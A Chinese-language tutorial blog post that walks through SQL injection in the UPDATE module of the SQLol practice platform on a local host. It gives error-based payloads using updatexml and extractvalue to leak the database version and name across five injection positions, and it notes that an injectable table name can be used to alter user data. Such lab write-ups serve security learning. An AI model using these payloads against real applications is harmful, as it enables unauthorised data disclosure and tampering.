SQL注入测试平台 SQLol -4.UPDATE注入测试

　　访问首页的update模块http://127.0.0.1/sql/update.php，开始对update模块进行测试。

update语法：

?

1	UPDATE 【users】 SET 【username】 = 【'haxotron9000'】 WHERE username = 【'1'】

接收的参数可能拼接到上述语句中【】的任一个位置，4个位置，共有5种不同的类型。下面开始演示：　

 

一、String in WHERE clause

构造POC：

?

1	' or updatexml(1,concat(0x7e,(version()),0x7e),0) or'

如下图，获取数据库版本　　

二、Integer in WHERE Clause

构造POC：

?

1	1 or extractvalue(1,concat(0x7e,database())) or''

如下图，获取数据库版本

三、Column Name

注入点在【1】处，

UPDATE users SET 【1】 = 'haxotron9000' WHERE isadmin = 0 

能想到的利用方式有两种：

1、注释掉后面的语句，自由构造报错语句进行执行

2、更改users表中的用户数据

POC：

?

1	UPDATE users SET id=1 or extractvalue(1,concat(0x7e,database()))

　　

四、Table Name

注入点在【1】处

 UPDATE 【1】 SET username = 'haxotron9000' WHERE isadmin = 0 

我们如何来利用呢？

1、表名可以自己控制，在知道某表某列的情况下，就可以自由更改数据啦。

2、构造报错注入，与上一个类似。

 

五、Value to write

注入点在【1】处

UPDATE users SET username =【 '1'】 WHERE isadmin = 0 

构造POC：

?

1	UPDATE users SET username = '1' or extractvalue(1,concat(0x7e,database()))#

　

似乎没什么新意，也就这几种方法在切换，以后想到别的方法再来更新吧

关于我：一个网络安全爱好者，致力于分享原创高质量干货，欢迎关注我的个人微信公众号：Bypass--，浏览更多精彩文章。